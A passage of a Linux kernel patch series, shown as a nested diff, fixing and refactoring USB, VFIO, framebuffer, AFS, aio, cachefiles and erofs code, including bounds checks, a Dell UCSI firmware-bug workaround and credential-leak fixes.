+ /* Indicate the cdns3 core was power lost before */
+ bool cdns_power_is_lost(struct cdns *cdns)
+ {
+diff --git a/drivers/usb/cdns3/drd.h b/drivers/usb/cdns3/drd.h
+index cbdf94f73ed91..d72370c321d39 100644
+--- a/drivers/usb/cdns3/drd.h
++++ b/drivers/usb/cdns3/drd.h
+@@ -79,7 +79,11 @@ struct cdnsp_otg_regs {
+ 	__le32 susp_timing_ctrl;
+ };
+ 
+-#define OTG_CDNSP_DID	0x0004034E
++/* CDNSP driver supports 0x000403xx Cadence USB controller family. */
++#define OTG_CDNSP_CHECK_DID(did) (((did) & GENMASK(31, 8)) == 0x00040300)
++
++/* CDNS3 driver supports 0x000402xx Cadence USB controller family. */
++#define OTG_CDNS3_CHECK_DID(did) (((did) & GENMASK(31, 8)) == 0x00040200)
+ 
+ /*
+  * Common registers interface for both CDNS3 and CDNSP version of DRD.
+diff --git a/drivers/usb/cdns3/host.c b/drivers/usb/cdns3/host.c
+index 6164fc4c96a49..ceca4d839dfd4 100644
+--- a/drivers/usb/cdns3/host.c
++++ b/drivers/usb/cdns3/host.c
+@@ -18,6 +18,11 @@
+ #include "../host/xhci.h"
+ #include "../host/xhci-plat.h"
+ 
++/*
++ * The XECP_PORT_CAP_REG and XECP_AUX_CTRL_REG1 exist only
++ * in Cadence USB3 dual-role controller, so it can't be used
++ * with Cadence CDNSP dual-role controller.
++ */
+ #define XECP_PORT_CAP_REG	0x8000
+ #define XECP_AUX_CTRL_REG1	0x8120
+ 
+@@ -57,6 +62,8 @@ static const struct xhci_plat_priv xhci_plat_cdns3_xhci = {
+ 	.resume_quirk = xhci_cdns3_resume_quirk,
+ };
+ 
++static const struct xhci_plat_priv xhci_plat_cdnsp_xhci;
++
+ static int __cdns_host_init(struct cdns *cdns)
+ {
+ 	struct platform_device *xhci;
+@@ -81,8 +88,13 @@ static int __cdns_host_init(struct cdns *cdns)
+ 		goto err1;
+ 	}
+ 
+-	cdns->xhci_plat_data = kmemdup(&xhci_plat_cdns3_xhci,
+-			sizeof(struct xhci_plat_priv), GFP_KERNEL);
++	if (cdns->version < CDNSP_CONTROLLER_V2)
++		cdns->xhci_plat_data = kmemdup(&xhci_plat_cdns3_xhci,
++				sizeof(struct xhci_plat_priv), GFP_KERNEL);
++	else
++		cdns->xhci_plat_data = kmemdup(&xhci_plat_cdnsp_xhci,
++				sizeof(struct xhci_plat_priv), GFP_KERNEL);
++
+ 	if (!cdns->xhci_plat_data) {
+ 		ret = -ENOMEM;
+ 		goto err1;
+diff --git a/drivers/usb/dwc3/gadget.c b/drivers/usb/dwc3/gadget.c
+index 576c21bf77cda..b134110cc2ed5 100644
+--- a/drivers/usb/dwc3/gadget.c
++++ b/drivers/usb/dwc3/gadget.c
+@@ -2548,6 +2548,11 @@ static int dwc3_gadget_soft_disconnect(struct dwc3 *dwc)
+ 	int ret;
+ 
+ 	spin_lock_irqsave(&dwc->lock, flags);
++	if (!dwc->pullups_connected) {
++		spin_unlock_irqrestore(&dwc->lock, flags);
++		return 0;
++	}
++
+ 	dwc->connected = false;
+ 
+ 	/*
+diff --git a/drivers/usb/gadget/function/f_ncm.c b/drivers/usb/gadget/function/f_ncm.c
+index bbb6ff6b11aa1..5e78fcc63e4d3 100644
+--- a/drivers/usb/gadget/function/f_ncm.c
++++ b/drivers/usb/gadget/function/f_ncm.c
+@@ -1340,7 +1340,15 @@ static int ncm_unwrap_ntb(struct gether *port,
+ 	     "Parsed NTB with %d frames\n", dgram_counter);
+ 
+ 	to_process -= block_len;
+-	if (to_process != 0) {
++
++	/*
++	 * Windows NCM driver avoids USB ZLPs by adding a 1-byte
++	 * zero pad as needed.
++	 */
++	if (to_process == 1 &&
++	    (*(unsigned char *)(ntb_ptr + block_len) == 0x00)) {
++		to_process--;
++	} else if (to_process > 0) {
+ 		ntb_ptr = (unsigned char *)(ntb_ptr + block_len);
+ 		goto parse_ntb;
+ 	}
+diff --git a/drivers/usb/roles/class.c b/drivers/usb/roles/class.c
+index 32e6d19f7011a..a327f8bc57043 100644
+--- a/drivers/usb/roles/class.c
++++ b/drivers/usb/roles/class.c
+@@ -19,7 +19,9 @@ static struct class *role_class;
+ struct usb_role_switch {
+ 	struct device dev;
+ 	struct mutex lock; /* device lock*/
++	struct module *module; /* the module this device depends on */
+ 	enum usb_role role;
++	bool registered;
+ 
+ 	/* From descriptor */
+ 	struct device *usb2_port;
+@@ -46,6 +48,9 @@ int usb_role_switch_set_role(struct usb_role_switch *sw, enum usb_role role)
+ 	if (IS_ERR_OR_NULL(sw))
+ 		return 0;
+ 
++	if (!sw->registered)
++		return -EOPNOTSUPP;
++
+ 	mutex_lock(&sw->lock);
+ 
+ 	ret = sw->set(sw, role);
+@@ -71,7 +76,7 @@ enum usb_role usb_role_switch_get_role(struct usb_role_switch *sw)
+ {
+ 	enum usb_role role;
+ 
+-	if (IS_ERR_OR_NULL(sw))
++	if (IS_ERR_OR_NULL(sw) || !sw->registered)
+ 		return USB_ROLE_NONE;
+ 
+ 	mutex_lock(&sw->lock);
+@@ -133,7 +138,7 @@ struct usb_role_switch *usb_role_switch_get(struct device *dev)
+ 						  usb_role_switch_match);
+ 
+ 	if (!IS_ERR_OR_NULL(sw))
+-		WARN_ON(!try_module_get(sw->dev.parent->driver->owner));
++		WARN_ON(!try_module_get(sw->module));
+ 
+ 	return sw;
+ }
+@@ -155,7 +160,7 @@ struct usb_role_switch *fwnode_usb_role_switch_get(struct fwnode_handle *fwnode)
+ 		sw = fwnode_connection_find_match(fwnode, "usb-role-switch",
+ 						  NULL, usb_role_switch_match);
+ 	if (!IS_ERR_OR_NULL(sw))
+-		WARN_ON(!try_module_get(sw->dev.parent->driver->owner));
++		WARN_ON(!try_module_get(sw->module));
+ 
+ 	return sw;
+ }
+@@ -170,7 +175,7 @@ EXPORT_SYMBOL_GPL(fwnode_usb_role_switch_get);
+ void usb_role_switch_put(struct usb_role_switch *sw)
+ {
+ 	if (!IS_ERR_OR_NULL(sw)) {
+-		module_put(sw->dev.parent->driver->owner);
++		module_put(sw->module);
+ 		put_device(&sw->dev);
+ 	}
+ }
+@@ -187,15 +192,18 @@ struct usb_role_switch *
+ usb_role_switch_find_by_fwnode(const struct fwnode_handle *fwnode)
+ {
+ 	struct device *dev;
++	struct usb_role_switch *sw = NULL;
+ 
+ 	if (!fwnode)
+ 		return NULL;
+ 
+ 	dev = class_find_device_by_fwnode(role_class, fwnode);
+-	if (dev)
+-		WARN_ON(!try_module_get(dev->parent->driver->owner));
++	if (dev) {
++		sw = to_role_switch(dev);
++		WARN_ON(!try_module_get(sw->module));
++	}
+ 
+-	return dev ? to_role_switch(dev) : NULL;
++	return sw;
+ }
+ EXPORT_SYMBOL_GPL(usb_role_switch_find_by_fwnode);
+ 
+@@ -337,6 +345,7 @@ usb_role_switch_register(struct device *parent,
+ 	sw->set = desc->set;
+ 	sw->get = desc->get;
+ 
++	sw->module = parent->driver->owner;
+ 	sw->dev.parent = parent;
+ 	sw->dev.fwnode = desc->fwnode;
+ 	sw->dev.class = role_class;
+@@ -351,6 +360,8 @@ usb_role_switch_register(struct device *parent,
+ 		return ERR_PTR(ret);
+ 	}
+ 
++	sw->registered = true;
++
+ 	/* TODO: Symlinks for the host port and the device controller. */
+ 
+ 	return sw;
+@@ -365,8 +376,10 @@ EXPORT_SYMBOL_GPL(usb_role_switch_register);
+  */
+ void usb_role_switch_unregister(struct usb_role_switch *sw)
+ {
+-	if (!IS_ERR_OR_NULL(sw))
++	if (!IS_ERR_OR_NULL(sw)) {
++		sw->registered = false;
+ 		device_unregister(&sw->dev);
++	}
+ }
+ EXPORT_SYMBOL_GPL(usb_role_switch_unregister);
+ 
+diff --git a/drivers/usb/typec/ucsi/ucsi_acpi.c b/drivers/usb/typec/ucsi/ucsi_acpi.c
+index 26171c5d3c61c..48130d636a020 100644
+--- a/drivers/usb/typec/ucsi/ucsi_acpi.c
++++ b/drivers/usb/typec/ucsi/ucsi_acpi.c
+@@ -25,6 +25,8 @@ struct ucsi_acpi {
+ 	unsigned long flags;
+ 	guid_t guid;
+ 	u64 cmd;
++	bool dell_quirk_probed;
++	bool dell_quirk_active;
+ };
+ 
+ static int ucsi_acpi_dsm(struct ucsi_acpi *ua, int func)
+@@ -126,12 +128,73 @@ static const struct ucsi_operations ucsi_zenbook_ops = {
+ 	.async_write = ucsi_acpi_async_write
+ };
+ 
+-static const struct dmi_system_id zenbook_dmi_id[] = {
++/*
++ * Some Dell laptops expect that an ACK command with the
++ * UCSI_ACK_CONNECTOR_CHANGE bit set is followed by a (separate)
++ * ACK command that only has the UCSI_ACK_COMMAND_COMPLETE bit set.
++ * If this is not done events are not delivered to OSPM and
++ * subsequent commands will timeout.
++ */
++static int
++ucsi_dell_sync_write(struct ucsi *ucsi, unsigned int offset,
++		     const void *val, size_t val_len)
++{
++	struct ucsi_acpi *ua = ucsi_get_drvdata(ucsi);
++	u64 cmd = *(u64 *)val, ack = 0;
++	int ret;
++
++	if (UCSI_COMMAND(cmd) == UCSI_ACK_CC_CI &&
++	    cmd & UCSI_ACK_CONNECTOR_CHANGE)
++		ack = UCSI_ACK_CC_CI | UCSI_ACK_COMMAND_COMPLETE;
++
++	ret = ucsi_acpi_sync_write(ucsi, offset, val, val_len);
++	if (ret != 0)
++		return ret;
++	if (ack == 0)
++		return ret;
++
++	if (!ua->dell_quirk_probed) {
++		ua->dell_quirk_probed = true;
++
++		cmd = UCSI_GET_CAPABILITY;
++		ret = ucsi_acpi_sync_write(ucsi, UCSI_CONTROL, &cmd,
++					   sizeof(cmd));
++		if (ret == 0)
++			return ucsi_acpi_sync_write(ucsi, UCSI_CONTROL,
++						    &ack, sizeof(ack));
++		if (ret != -ETIMEDOUT)
++			return ret;
++
++		ua->dell_quirk_active = true;
++		dev_err(ua->dev, "Firmware bug: Additional ACK required after ACKing a connector change.\n");
++		dev_err(ua->dev, "Firmware bug: Enabling workaround\n");
++	}
++
++	if (!ua->dell_quirk_active)
++		return ret;
++
++	return ucsi_acpi_sync_write(ucsi, UCSI_CONTROL, &ack, sizeof(ack));
++}
++
++static const struct ucsi_operations ucsi_dell_ops = {
++	.read = ucsi_acpi_read,
++	.sync_write = ucsi_dell_sync_write,
++	.async_write = ucsi_acpi_async_write
++};
++
++static const struct dmi_system_id ucsi_acpi_quirks[] = {
+ 	{
+ 		.matches = {
+ 			DMI_MATCH(DMI_SYS_VENDOR, "ASUSTeK COMPUTER INC."),
+ 			DMI_MATCH(DMI_PRODUCT_NAME, "ZenBook UX325UA_UM325UA"),
+ 		},
++		.driver_data = (void *)&ucsi_zenbook_ops,
++	},
++	{
++		.matches = {
++			DMI_MATCH(DMI_SYS_VENDOR, "Dell Inc."),
++		},
++		.driver_data = (void *)&ucsi_dell_ops,
+ 	},
+ 	{ }
+ };
+@@ -160,6 +223,7 @@ static int ucsi_acpi_probe(struct platform_device *pdev)
+ {
+ 	struct acpi_device *adev = ACPI_COMPANION(&pdev->dev);
+ 	const struct ucsi_operations *ops = &ucsi_acpi_ops;
++	const struct dmi_system_id *id;
+ 	struct ucsi_acpi *ua;
+ 	struct resource *res;
+ 	acpi_status status;
+@@ -189,8 +253,9 @@ static int ucsi_acpi_probe(struct platform_device *pdev)
+ 	init_completion(&ua->complete);
+ 	ua->dev = &pdev->dev;
+ 
+-	if (dmi_check_system(zenbook_dmi_id))
+-		ops = &ucsi_zenbook_ops;
++	id = dmi_first_match(ucsi_acpi_quirks);
++	if (id)
++		ops = id->driver_data;
+ 
+ 	ua->ucsi = ucsi_create(&pdev->dev, ops);
+ 	if (IS_ERR(ua->ucsi))
+diff --git a/drivers/vfio/iova_bitmap.c b/drivers/vfio/iova_bitmap.c
+index 0f19d502f351b..dfab5b742191a 100644
+--- a/drivers/vfio/iova_bitmap.c
++++ b/drivers/vfio/iova_bitmap.c
+@@ -99,7 +99,7 @@ struct iova_bitmap {
+ 	struct iova_bitmap_map mapped;
+ 
+ 	/* userspace address of the bitmap */
+-	u64 __user *bitmap;
++	u8 __user *bitmap;
+ 
+ 	/* u64 index that @mapped points to */
+ 	unsigned long mapped_base_index;
+@@ -161,7 +161,7 @@ static int iova_bitmap_get(struct iova_bitmap *bitmap)
+ {
+ 	struct iova_bitmap_map *mapped = &bitmap->mapped;
+ 	unsigned long npages;
+-	u64 __user *addr;
++	u8 __user *addr;
+ 	long ret;
+ 
+ 	/*
+@@ -174,18 +174,19 @@ static int iova_bitmap_get(struct iova_bitmap *bitmap)
+ 			       bitmap->mapped_base_index) *
+ 			       sizeof(*bitmap->bitmap), PAGE_SIZE);
+ 
+-	/*
+-	 * We always cap at max number of 'struct page' a base page can fit.
+-	 * This is, for example, on x86 means 2M of bitmap data max.
+-	 */
+-	npages = min(npages,  PAGE_SIZE / sizeof(struct page *));
+-
+ 	/*
+ 	 * Bitmap address to be pinned is calculated via pointer arithmetic
+ 	 * with bitmap u64 word index.
+ 	 */
+ 	addr = bitmap->bitmap + bitmap->mapped_base_index;
+ 
++	/*
++	 * We always cap at max number of 'struct page' a base page can fit.
++	 * This is, for example, on x86 means 2M of bitmap data max.
++	 */
++	npages = min(npages + !!offset_in_page(addr),
++		     PAGE_SIZE / sizeof(struct page *));
++
+ 	ret = pin_user_pages_fast((unsigned long)addr, npages,
+ 				  FOLL_WRITE, mapped->pages);
+ 	if (ret <= 0)
+@@ -246,7 +247,7 @@ struct iova_bitmap *iova_bitmap_alloc(unsigned long iova, size_t length,
+ 
+ 	mapped = &bitmap->mapped;
+ 	mapped->pgshift = __ffs(page_size);
+-	bitmap->bitmap = data;
++	bitmap->bitmap = (u8 __user *)data;
+ 	bitmap->mapped_total_index =
+ 		iova_bitmap_offset_to_index(bitmap, length - 1) + 1;
+ 	bitmap->iova = iova;
+@@ -301,7 +302,7 @@ static unsigned long iova_bitmap_mapped_remaining(struct iova_bitmap *bitmap)
+ 
+ 	remaining = bitmap->mapped_total_index - bitmap->mapped_base_index;
+ 	remaining = min_t(unsigned long, remaining,
+-			  bytes / sizeof(*bitmap->bitmap));
++			  DIV_ROUND_UP(bytes, sizeof(*bitmap->bitmap)));
+ 
+ 	return remaining;
+ }
+@@ -405,6 +406,7 @@ void iova_bitmap_set(struct iova_bitmap *bitmap,
+ 			mapped->pgshift) + mapped->pgoff * BITS_PER_BYTE;
+ 	unsigned long last_bit = (((iova + length - 1) - mapped->iova) >>
+ 			mapped->pgshift) + mapped->pgoff * BITS_PER_BYTE;
++	unsigned long last_page_idx = mapped->npages - 1;
+ 
+ 	do {
+ 		unsigned int page_idx = cur_bit / BITS_PER_PAGE;
+@@ -413,6 +415,9 @@ void iova_bitmap_set(struct iova_bitmap *bitmap,
+ 					 last_bit - cur_bit + 1);
+ 		void *kaddr;
+ 
++		if (unlikely(page_idx > last_page_idx))
++			break;
++
+ 		kaddr = kmap_local_page(mapped->pages[page_idx]);
+ 		bitmap_set(kaddr, offset, nbits);
+ 		kunmap_local(kaddr);
+diff --git a/drivers/video/fbdev/savage/savagefb_driver.c b/drivers/video/fbdev/savage/savagefb_driver.c
+index b7818b652698f..a7b63c475f954 100644
+--- a/drivers/video/fbdev/savage/savagefb_driver.c
++++ b/drivers/video/fbdev/savage/savagefb_driver.c
+@@ -869,6 +869,9 @@ static int savagefb_check_var(struct fb_var_screeninfo   *var,
+ 
+ 	DBG("savagefb_check_var");
+ 
++	if (!var->pixclock)
++		return -EINVAL;
++
+ 	var->transp.offset = 0;
+ 	var->transp.length = 0;
+ 	switch (var->bits_per_pixel) {
+diff --git a/drivers/video/fbdev/sis/sis_main.c b/drivers/video/fbdev/sis/sis_main.c
+index 1c197c3f95381..fe8996461b9ef 100644
+--- a/drivers/video/fbdev/sis/sis_main.c
++++ b/drivers/video/fbdev/sis/sis_main.c
+@@ -1475,6 +1475,8 @@ sisfb_check_var(struct fb_var_screeninfo *var, struct fb_info *info)
+ 
+ 	vtotal = var->upper_margin + var->lower_margin + var->vsync_len;
+ 
++	if (!var->pixclock)
++		return -EINVAL;
+ 	pixclock = var->pixclock;
+ 
+ 	if((var->vmode & FB_VMODE_MASK) == FB_VMODE_NONINTERLACED) {
+diff --git a/fs/afs/volume.c b/fs/afs/volume.c
+index 1c9144e3e83ac..a146d70efa650 100644
+--- a/fs/afs/volume.c
++++ b/fs/afs/volume.c
+@@ -341,7 +341,7 @@ static int afs_update_volume_status(struct afs_volume *volume, struct key *key)
+ {
+ 	struct afs_server_list *new, *old, *discard;
+ 	struct afs_vldb_entry *vldb;
+-	char idbuf[16];
++	char idbuf[24];
+ 	int ret, idsz;
+ 
+ 	_enter("");
+@@ -349,7 +349,7 @@ static int afs_update_volume_status(struct afs_volume *volume, struct key *key)
+ 	/* We look up an ID by passing it as a decimal string in the
+ 	 * operation's name parameter.
+ 	 */
+-	idsz = sprintf(idbuf, "%llu", volume->vid);
++	idsz = snprintf(idbuf, sizeof(idbuf), "%llu", volume->vid);
+ 
+ 	vldb = afs_vl_lookup_vldb(volume->cell, key, idbuf, idsz);
+ 	if (IS_ERR(vldb)) {
+diff --git a/fs/aio.c b/fs/aio.c
+index e85ba0b77f596..849c3e3ed558b 100644
+--- a/fs/aio.c
++++ b/fs/aio.c
+@@ -595,6 +595,13 @@ void kiocb_set_cancel_fn(struct kiocb *iocb, kiocb_cancel_fn *cancel)
+ 	struct kioctx *ctx = req->ki_ctx;
+ 	unsigned long flags;
+ 
++	/*
++	 * kiocb didn't come from aio or is neither a read nor a write, hence
++	 * ignore it.
++	 */
++	if (!(iocb->ki_flags & IOCB_AIO_RW))
++		return;
++
+ 	if (WARN_ON_ONCE(!list_empty(&req->ki_list)))
+ 		return;
+ 
+@@ -1476,7 +1483,7 @@ static int aio_prep_rw(struct kiocb *req, const struct iocb *iocb)
+ 	req->ki_complete = aio_complete_rw;
+ 	req->private = NULL;
+ 	req->ki_pos = iocb->aio_offset;
+-	req->ki_flags = req->ki_filp->f_iocb_flags;
++	req->ki_flags = req->ki_filp->f_iocb_flags | IOCB_AIO_RW;
+ 	if (iocb->aio_flags & IOCB_FLAG_RESFD)
+ 		req->ki_flags |= IOCB_EVENTFD;
+ 	if (iocb->aio_flags & IOCB_FLAG_IOPRIO) {
+diff --git a/fs/cachefiles/cache.c b/fs/cachefiles/cache.c
+index 7077f72e6f474..f449f7340aad0 100644
+--- a/fs/cachefiles/cache.c
++++ b/fs/cachefiles/cache.c
+@@ -168,6 +168,8 @@ int cachefiles_add_cache(struct cachefiles_cache *cache)
+ 	dput(root);
+ error_open_root:
+ 	cachefiles_end_secure(cache, saved_cred);
++	put_cred(cache->cache_cred);
++	cache->cache_cred = NULL;
+ error_getsec:
+ 	fscache_relinquish_cache(cache_cookie);
+ 	cache->cache = NULL;
+diff --git a/fs/cachefiles/daemon.c b/fs/cachefiles/daemon.c
+index aa4efcabb5e37..5f4df9588620f 100644
+--- a/fs/cachefiles/daemon.c
++++ b/fs/cachefiles/daemon.c
+@@ -805,6 +805,7 @@ static void cachefiles_daemon_unbind(struct cachefiles_cache *cache)
+ 	cachefiles_put_directory(cache->graveyard);
+ 	cachefiles_put_directory(cache->store);
+ 	mntput(cache->mnt);
++	put_cred(cache->cache_cred);
+ 
+ 	kfree(cache->rootdirname);
+ 	kfree(cache->secctx);
+diff --git a/fs/erofs/compress.h b/fs/erofs/compress.h
+index 26fa170090b8f..c4a3187bdb8fc 100644
+--- a/fs/erofs/compress.h
++++ b/fs/erofs/compress.h
+@@ -21,6 +21,8 @@ struct z_erofs_decompress_req {
+ };
+ 
+ struct z_erofs_decompressor {
++	int (*config)(struct super_block *sb, struct erofs_super_block *dsb,
++		      void *data, int size);
+ 	int (*decompress)(struct z_erofs_decompress_req *rq,
+ 			  struct page **pagepool);
+ 	char *name;
+@@ -93,6 +95,8 @@ int z_erofs_decompress(struct z_erofs_decompress_req *rq,
+ 		       struct page **pagepool);
+ 
+ /* prototypes for specific algorithms */
++int z_erofs_load_lzma_config(struct super_block *sb,
++			struct erofs_super_block *dsb, void *data, int size);
+ int z_erofs_lzma_decompress(struct z_erofs_decompress_req *rq,
+ 			    struct page **pagepool);
+ #endif
+diff --git a/fs/erofs/decompressor.c b/fs/erofs/decompressor.c
+index 0cfad74374ca9..1eefa4411e066 100644
+--- a/fs/erofs/decompressor.c
++++ b/fs/erofs/decompressor.c
+@@ -24,11 +24,11 @@ struct z_erofs_lz4_decompress_ctx {
+ 	unsigned int oend;
+ };
+ 
+-int z_erofs_load_lz4_config(struct super_block *sb,
+-			    struct erofs_super_block *dsb,
+-			    struct z_erofs_lz4_cfgs *lz4, int size)
++static int z_erofs_load_lz4_config(struct super_block *sb,
++			    struct erofs_super_block *dsb, void *data, int size)
+ {
+ 	struct erofs_sb_info *sbi = EROFS_SB(sb);
++	struct z_erofs_lz4_cfgs *lz4 = data;
+ 	u16 distance;
+ 
+ 	if (lz4) {
+@@ -374,17 +374,71 @@ static struct z_erofs_decompressor decompressors[] = {
+ 		.name = "interlaced"
+ 	},
+ 	[Z_EROFS_COMPRESSION_LZ4] = {
++		.config = z_erofs_load_lz4_config,
+ 		.decompress = z_erofs_lz4_decompress,
+ 		.name = "lz4"
+ 	},
+ #ifdef CONFIG_EROFS_FS_ZIP_LZMA
+ 	[Z_EROFS_COMPRESSION_LZMA] = {
++		.config = z_erofs_load_lzma_config,
+ 		.decompress = z_erofs_lzma_decompress,
+ 		.name = "lzma"
+ 	},
+ #endif
+ };
+ 
++int z_erofs_parse_cfgs(struct super_block *sb, struct erofs_super_block *dsb)
++{
++	struct erofs_sb_info *sbi = EROFS_SB(sb);
++	struct erofs_buf buf = __EROFS_BUF_INITIALIZER;
++	unsigned int algs, alg;
++	erofs_off_t offset;
++	int size, ret = 0;
++
++	if (!erofs_sb_has_compr_cfgs(sbi)) {
++		sbi->available_compr_algs = 1 << Z_EROFS_COMPRESSION_LZ4;
++		return z_erofs_load_lz4_config(sb, dsb, NULL, 0);
++	}
++
++	sbi->available_compr_algs = le16_to_cpu(dsb->u1.available_compr_algs);
++	if (sbi->available_compr_algs & ~Z_EROFS_ALL_COMPR_ALGS) {
++		erofs_err(sb, "unidentified algorithms %x, please upgrade kernel",
++			  sbi->available_compr_algs & ~Z_EROFS_ALL_COMPR_ALGS);
++		return -EOPNOTSUPP;
++	}
++
++	offset = EROFS_SUPER_OFFSET + sbi->sb_size;
++	alg = 0;
++	for (algs = sbi->available_compr_algs; algs; algs >>= 1, ++alg) {
++		void *data;
++
++		if (!(algs & 1))
++			continue;
++
++		data = erofs_read_metadata(sb, &buf, &offset, &size);
++		if (IS_ERR(data)) {
++			ret = PTR_ERR(data);
++			break;
++		}
++
++		if (alg >= ARRAY_SIZE(decompressors) ||
++		    !decompressors[alg].config) {
++			erofs_err(sb, "algorithm %d isn't enabled on this kernel",
++				  alg);
++			ret = -EOPNOTSUPP;
++		} else {
++			ret = decompressors[alg].config(sb,
++					dsb, data, size);
++		}
++
++		kfree(data);
++		if (ret)
++			break;
++	}
++	erofs_put_metabuf(&buf);
++	return ret;
++}
++
+ int z_erofs_decompress(struct z_erofs_decompress_req *rq,
+ 		       struct page **pagepool)
+ {
+diff --git a/fs/erofs/decompressor_lzma.c b/fs/erofs/decompressor_lzma.c
+index 49addc345aebe..970464c4b6769 100644
+--- a/fs/erofs/decompressor_lzma.c
++++ b/fs/erofs/decompressor_lzma.c
+@@ -72,10 +72,10 @@ int z_erofs_lzma_init(void)
+ }
+ 
+ int z_erofs_load_lzma_config(struct super_block *sb,
+-			     struct erofs_super_block *dsb,
+-			     struct z_erofs_lzma_cfgs *lzma, int size)
++			struct erofs_super_block *dsb, void *data, int size)
+ {
+ 	static DEFINE_MUTEX(lzma_resize_mutex);
++	struct z_erofs_lzma_cfgs *lzma = data;
+ 	unsigned int dict_size, i;
+ 	struct z_erofs_lzma *strm, *head = NULL;
+ 	int err;
+diff --git a/fs/erofs/internal.h b/fs/erofs/internal.h
+index d8d09fc3ed655..79a7a5815ea63 100644
+--- a/fs/erofs/internal.h
++++ b/fs/erofs/internal.h
+@@ -471,6 +471,8 @@ struct erofs_map_dev {
+ 
+ /* data.c */
+ extern const struct file_operations erofs_file_fops;
++void *erofs_read_metadata(struct super_block *sb, struct erofs_buf *buf,
++			  erofs_off_t *offset, int *lengthp);
+ void erofs_unmap_metabuf(struct erofs_buf *buf);
+ void erofs_put_metabuf(struct erofs_buf *buf);
+ void *erofs_bread(struct erofs_buf *buf, struct inode *inode,
+@@ -565,9 +567,7 @@ void z_erofs_exit_zip_subsystem(void);
+ int erofs_try_to_free_all_cached_pages(struct erofs_sb_info *sbi,
+ 				       struct erofs_workgroup *egrp);
+ int erofs_try_to_free_cached_page(struct page *page);
+-int z_erofs_load_lz4_config(struct super_block *sb,
+-			    struct erofs_super_block *dsb,
+-			    struct z_erofs_lz4_cfgs *lz4, int len);
++int z_erofs_parse_cfgs(struct super_block *sb, struct erofs_super_block *dsb);
+ #else
+ static inline void erofs_shrinker_register(struct super_block *sb) {}
+ static inline void erofs_shrinker_unregister(struct super_block *sb) {}
+@@ -575,36 +575,14 @@ static inline int erofs_init_shrinker(void) { return 0; }
+ static inline void erofs_exit_shrinker(void) {}
+ static inline int z_erofs_init_zip_subsystem(void) { return 0; }
+ static inline void z_erofs_exit_zip_subsystem(void) {}
+-static inline int z_erofs_load_lz4_config(struct super_block *sb,
+-				  struct erofs_super_block *dsb,
+-				  struct z_erofs_lz4_cfgs *lz4, int len)
+-{
+-	if (lz4 || dsb->u1.lz4_max_distance) {
+-		erofs_err(sb, "lz4 algorithm isn't enabled");
+-		return -EINVAL;
+-	}
+-	return 0;
+-}
+ #endif	/* !CONFIG_EROFS_FS_ZIP */
+ 
+ #ifdef CONFIG_EROFS_FS_ZIP_LZMA
+ int z_erofs_lzma_init(void);
+ void z_erofs_lzma_exit(void);
+-int z_erofs_load_lzma_config(struct super_block *sb,
+-			     struct erofs_super_block *dsb,
+-			     struct z_erofs_lzma_cfgs *lzma, int size);
+ #else
+ static inline int z_erofs_lzma_init(void) { return 0; }
+ static inline int z_erofs_lzma_exit(void) { return 0; }
+-static inline int z_erofs_load_lzma_config(struct super_block *sb,
+-			     struct erofs_super_block *dsb,
+-			     struct z_erofs_lzma_cfgs *lzma, int size) {
+-	if (lzma) {
+-		erofs_err(sb, "lzma algorithm isn't enabled");
+-		return -EINVAL;
+-	}
+-	return 0;
+-}
+ #endif	/* !CONFIG_EROFS_FS_ZIP */
+ 
+ /* flags for erofs_fscache_register_cookie() */
+diff --git a/fs/erofs/namei.c b/fs/erofs/namei.c
+index 0dc34721080c7..e8ccaa761bd63 100644
+--- a/fs/erofs/namei.c
++++ b/fs/erofs/namei.c
+@@ -137,24 +137,24 @@ static void *find_target_block_classic(struct erofs_buf *target,
+ 			/* string comparison without already matched prefix */
+ 			diff = erofs_dirnamecmp(name, &dname, &matched);
+ 
+-			if (!diff) {
+-				*_ndirents = 0;
+-				goto out;
+-			} else if (diff > 0) {
+-				head = mid + 1;
+-				startprfx = matched;
+-
+-				if (!IS_ERR(candidate))
+-					erofs_put_metabuf(target);
+-				*target = buf;
+-				candidate = de;
+-				*_ndirents = ndirents;
+-			} else {
++			if (diff < 0) {
+ 				erofs_put_metabuf(&buf);
+-
+ 				back = mid - 1;
+ 				endprfx = matched;
++				continue;
++			}
++
++			if (!IS_ERR(candidate))
++				erofs_put_metabuf(target);
++			*target = buf;
++			if (!diff) {
++				*_ndirents = 0;
++				return de;
+ 			}
++			head = mid + 1;
++			startprfx = matched;
++			candidate = de;
++			*_ndirents = ndirents;
+ 			continue;
+ 		}
+ out:		/* free if the candidate is valid */
+diff --git a/fs/erofs/super.c b/fs/erofs/super.c
+index bd8bf8fc2f5df..f2647126cb2fb 100644
+--- a/fs/erofs/super.c
++++ b/fs/erofs/super.c
+@@ -126,8 +126,8 @@ static bool check_layout_compatibility(struct super_block *sb,
+ 
+ #ifdef CONFIG_EROFS_FS_ZIP
+ /* read variable-sized metadata, offset will be aligned by 4-byte */
+-static void *erofs_read_metadata(struct super_block *sb, struct erofs_buf *buf,
+-				 erofs_off_t *offset, int *lengthp)
++void *erofs_read_metadata(struct super_block *sb, struct erofs_buf *buf,
++			  erofs_off_t *offset, int *lengthp)
+ {
+ 	u8 *buffer, *ptr;
+ 	int len, i, cnt;
+@@ -159,64 +159,15 @@ static void *erofs_read_metadata(struct super_block *sb, struct erofs_buf *buf,
+ 	}
+ 	return buffer;
+ }
+-
+-static int erofs_load_compr_cfgs(struct super_block *sb,
+-				 struct erofs_super_block *dsb)
+-{
+-	struct erofs_sb_info *sbi = EROFS_SB(sb);
+-	struct erofs_buf buf = __EROFS_BUF_INITIALIZER;
+-	unsigned int algs, alg;
+-	erofs_off_t offset;
+-	int size, ret = 0;
+-
+-	sbi->available_compr_algs = le16_to_cpu(dsb->u1.available_compr_algs);
+-	if (sbi->available_compr_algs & ~Z_EROFS_ALL_COMPR_ALGS) {
+-		erofs_err(sb, "try to load compressed fs with unsupported algorithms %x",
+-			  sbi->available_compr_algs & ~Z_EROFS_ALL_COMPR_ALGS);
+-		return -EINVAL;
+-	}
+-
+-	offset = EROFS_SUPER_OFFSET + sbi->sb_size;
+-	alg = 0;
+-	for (algs = sbi->available_compr_algs; algs; algs >>= 1, ++alg) {
+-		void *data;
+-
+-		if (!(algs & 1))
+-			continue;
+-
+-		data = erofs_read_metadata(sb, &buf, &offset, &size);
+-		if (IS_ERR(data)) {
+-			ret = PTR_ERR(data);
+-			break;
+-		}
+-
+-		switch (alg) {
+-		case Z_EROFS_COMPRESSION_LZ4:
+-			ret = z_erofs_load_lz4_config(sb, dsb, data, size);
+-			break;
+-		case Z_EROFS_COMPRESSION_LZMA:
+-			ret = z_erofs_load_lzma_config(sb, dsb, data, size);
